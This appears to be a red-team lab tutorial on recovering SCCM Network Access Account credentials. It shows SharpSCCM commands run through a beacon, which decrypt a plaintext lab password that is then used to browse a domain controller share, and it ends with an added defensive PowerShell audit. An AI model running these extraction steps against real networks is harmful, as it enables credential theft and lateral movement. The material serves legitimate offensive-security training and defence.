In a Windows environment, the majority of computers will be domain-joined and will therefore authenticate to SCCM Software Distribution Points (SDPs) (basically just SMB shares) using their own machine account credentials. However, some computers may not be domain-joined. Network Access Account credentials (NAAs) are domain credentials intended to be used by these machines to access the SDPs over the network. They are passed to the machines as part of the SCCM machine policies, then encrypted using DPAPI and stored locally. If they are present, privileged users can retrieve these credential blobs via WMI or directly from disk and decrypt them to recover plaintext credentials.
Use SharpSCCM's local naa command with -m wmi or -m disk.
beacon> getuid
[*] You are DEV\bfarmer (admin)
beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe local naa -m wmi --no-banner
[+] Connecting to \\127.0.0.1\root\ccm\policy\Machine\ActualConfig
[+] Retrieving network access account blobs via WMI
[+] Retrieving task sequence blobs via WMI
[+] Retrieving collection variable blobs via WMI
[...snip...]
[+] Decrypting network access account credentials
NetworkAccessUsername: cyberbotic.io\sccm_svc
NetworkAccessPassword: Cyberb0tic
These credentials should only have read access to the SDP, but are often over-privileged (sometimes even domain/enterprise admins).
beacon> make_token cyberbotic.io\sccm_svc Cyberb0tic
[+] Impersonated cyberbotic.io\sccm_svc (netonly)
beacon> ls \\dc-1.cyberbotic.io\c$
[*] Listing: \\dc-1.cyberbotic.io\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/15/2022 15:26:54 $Recycle.Bin
dir 08/10/2022 04:55:17 $WinREAgent
dir 08/10/2022 05:05:53 Boot
dir 08/18/2021 23:34:55 Documents and Settings
dir 08/19/2021 06:24:49 EFI
dir 05/08/2021 08:20:24 PerfLogs
dir 09/26/2023 09:07:25 Program Files
dir 08/10/2022 04:06:16 Program Files (x86)
dir 09/26/2023 09:13:26 ProgramData
dir 08/15/2022 15:07:48 Recovery
dir 08/24/2022 11:05:32 Shares
dir 09/26/2023 14:28:24 System Volume Information
dir 08/15/2022 15:09:04 Users
dir 09/26/2023 09:10:03 Windows
427kb fil 08/10/2022 05:00:07 bootmgr
1b fil 05/08/2021 08:14:33 BOOTNXT
12kb fil 09/27/2023 09:28:28 DumpStack.log.tmp
1kb fil 09/25/2023 19:07:33 ExtADSch.log
384mb fil 09/27/2023 09:28:28 pagefile.sys
An alternate approach is to request a copy of the policy directly from SCCM using get naa. This also requires local admin on the local machine, in order to obtain a copy of its SMS Signing and SMS Encryption certificates.
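To audit this exposure from the defensive side, the following PowerShell is an added example (not from the original page or from SharpSCCM): it checks whether an NAA policy is cached on a client, without reading or decrypting the blobs, and whether the NAA account is a member of privileged groups. The function name Test-NaaExposure, its parameters and the use of the RSAT ActiveDirectory module are assumptions; CCM_NetworkAccessAccount is the WMI class that holds the NAA in the namespace shown in the output above.

```powershell
# Added audit example, not code from the original page.
# Run elevated on an SCCM client; needs the RSAT ActiveDirectory module.
function Test-NaaExposure {
    param(
        # Assumption: NAA account name taken from your SCCM site configuration
        [Parameter(Mandatory)][string]$NaaSamAccountName,
        # Assumption: DNS name of the domain that holds the account
        [string]$Server = $env:USERDNSDOMAIN
    )

    # 1. Is an NAA policy cached locally? Instances are only counted; the
    #    DPAPI-protected blobs are neither read out nor decrypted.
    $naaCount = 0
    $query = @{
        Namespace   = 'root\ccm\policy\Machine\ActualConfig'
        ClassName   = 'CCM_NetworkAccessAccount'
        ErrorAction = 'Stop'
    }
    try { $naaCount = @(Get-CimInstance @query).Count }
    catch { Write-Warning "NAA policy query failed: $($_.Exception.Message)" }

    # 2. All groups the account is in, nested ones included
    #    (LDAP_MATCHING_RULE_IN_CHAIN). Only groups in $Server's domain are seen.
    Import-Module ActiveDirectory -ErrorAction Stop
    $user   = Get-ADUser -Identity $NaaSamAccountName -Server $Server
    $filter = "(member:1.2.840.113556.1.4.1941:=$($user.DistinguishedName))"
    $groups = Get-ADGroup -LDAPFilter $filter -Server $Server

    # 3. Match privileged groups by SID so renamed or localized groups count.
    #    512 Domain Admins, 518 Schema Admins, 519 Enterprise Admins,
    #    544 Administrators, 548 Account Ops, 549 Server Ops, 551 Backup Ops.
    $privileged = @($groups | Where-Object {
        $_.SID.Value -match '^S-1-5-21-.+-(512|518|519)$' -or
        $_.SID.Value -match '^S-1-5-32-(544|548|549|551)$'
    })

    [pscustomobject]@{
        Computer         = $env:COMPUTERNAME
        NaaPolicyCached  = ($naaCount -gt 0)
        NaaInstances     = $naaCount
        Account          = $user.SamAccountName
        PrivilegedGroups = $privileged.Name
        OverPrivileged   = ($privileged.Count -gt 0)
    }
}

# 'sccm_svc' and 'cyberbotic.io' are the lab values shown in the output above
Test-NaaExposure -NaaSamAccountName 'sccm_svc' -Server 'cyberbotic.io'
```

The group check only covers domain group membership; rights granted directly on hosts or shares need a separate review.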